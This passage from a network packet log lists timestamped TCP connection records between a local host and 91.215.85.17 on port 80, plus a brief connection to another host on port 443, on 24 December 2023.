Dec 24, 2023 10:44:27.288866043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288880110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288912058 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.288933992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288935900 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.288974047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.289036989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.289074898 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.289119005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.289175034 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.289263010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.289305925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.289371014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.289418936 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.289453983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.289501905 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.289539099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.289573908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.289583921 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.289616108 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.289628029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.289671898 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.289710045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.289741993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.289753914 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.289786100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.289810896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.289855003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.289890051 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.289938927 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.289962053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.289985895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.290005922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.290030956 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.290082932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.290129900 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.290167093 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.290209055 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.290235996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.290281057 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.290338039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.290364981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.290381908 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.290395975 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.290436983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.290482998 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.290625095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.290671110 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.290689945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.290744066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.290767908 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.290782928 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.290879011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.290966034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.290978909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.291017056 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.291037083 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.291065931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.291129112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.291183949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.291188002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.291219950 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.291248083 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.291250944 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.291337013 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.291384935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.291402102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.291450977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.291496038 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.291507959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.291555882 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.291582108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.291668892 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.291672945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.291718006 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.291744947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.291802883 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.291805983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.291845083 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.291851997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.291896105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.291920900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.291960955 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.292022943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.292089939 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.292144060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.292190075 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.292253017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.292298079 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.292531013 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.292578936 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.292596102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.292639017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.292651892 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.292665958 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.292695045 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.292707920 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.292757034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.292788982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.292810917 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.292823076 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.292870045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.292884111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.292913914 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.292927980 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.292947054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.292984009 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.292989969 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.293064117 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.293076992 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.293103933 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.293129921 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.293169022 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.293184042 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.293222904 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.293287039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.293329954 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.293349981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.293437004 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.293478966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.293488979 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.293519020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.293556929 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.293704987 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.293765068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.293781996 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.293803930 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.293817043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.293862104 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.293926001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.293961048 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.293968916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.294002056 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.294147015 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.294190884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.294205904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.294251919 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.294255972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.294295073 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.294315100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.294353962 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.294409990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.294450998 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.294595003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.294631958 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.294681072 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.294684887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.295104980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.295146942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.295165062 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.295192003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.295305014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.295346022 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.295397997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.295397997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.295408964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.295447111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.295490026 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.295526028 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.295567989 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.295938015 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.295949936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.295979023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.295989990 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.296015978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.296063900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.296099901 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.296127081 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.296168089 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.296204090 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.296241999 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.296242952 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.296837091 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.347266912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.347299099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.347357035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.347366095 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.347446918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.347487926 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.347659111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.365756035 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.365786076 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.570478916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.570512056 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.844548941 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.862001896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.886686087 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.886737108 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.990422010 CET	49719	443	192.168.2.5	192.36.38.33
Dec 24, 2023 10:44:27.990466118 CET	443	49719	192.36.38.33	192.168.2.5
Dec 24, 2023 10:44:27.990581989 CET	49719	443	192.168.2.5	192.36.38.33
Dec 24, 2023 10:44:28.003048897 CET	49719	443	192.168.2.5	192.36.38.33
Dec 24, 2023 10:44:28.003073931 CET	443	49719	192.36.38.33	192.168.2.5
Dec 24, 2023 10:44:28.160726070 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.180294037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.180425882 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.180442095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.180454016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.180495024 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.180521011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.180569887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.180615902 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.180654049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.180717945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.180788040 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.180799961 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.180872917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.180917025 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.180934906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.180984974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.181039095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.181085110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.181088924 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.181158066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.181205034 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.181231022 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.181273937 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.181294918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.181313992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.181376934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.181402922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.181447983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.181489944 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.181535006 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.181562901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.181596041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.181637049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.181720018 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.181762934 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.181782961 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.181828022 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.181868076 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.181886911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.181961060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182004929 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.182018995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182094097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182163000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182200909 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.182216883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182245970 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182286024 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.182307005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182341099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182353020 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.182413101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182450056 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182490110 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.182503939 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182601929 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.182602882 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182638884 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182681084 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.182706118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182734966 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182774067 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.182801008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182876110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182889938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182931900 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.182946920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.182995081 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183036089 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.183054924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183068991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183094978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.183130980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183183908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183224916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.183255911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183298111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183339119 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.183342934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183389902 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.183397055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183471918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183516026 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.183526993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183581114 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183623075 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.183640957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183713913 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183804035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183847904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183852911 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.183883905 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183888912 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.183936119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.183975935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.184000015 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.184051037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.184092045 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.184099913 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.184160948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.184242964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.184288025 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.184303045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.184351921 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.184401035 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.184426069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.184462070 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.184554100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.184601068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.184650898 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.184653997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.184729099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.184775114 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.184778929 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.184869051 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.184904099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.184952974 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.184961081 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185058117 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185106039 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.185107946 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185146093 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.185167074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185230017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185270071 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185286045 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.185322046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185368061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185416937 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.185436964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185518026 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185570002 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.185570955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185609102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.185636997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185692072 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185736895 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.185743093 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185756922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185796022 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.185847998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185898066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.185950994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.186002970 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.186028004 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.186041117 CET	80	49716	91.215.85.17	192.168.2.5
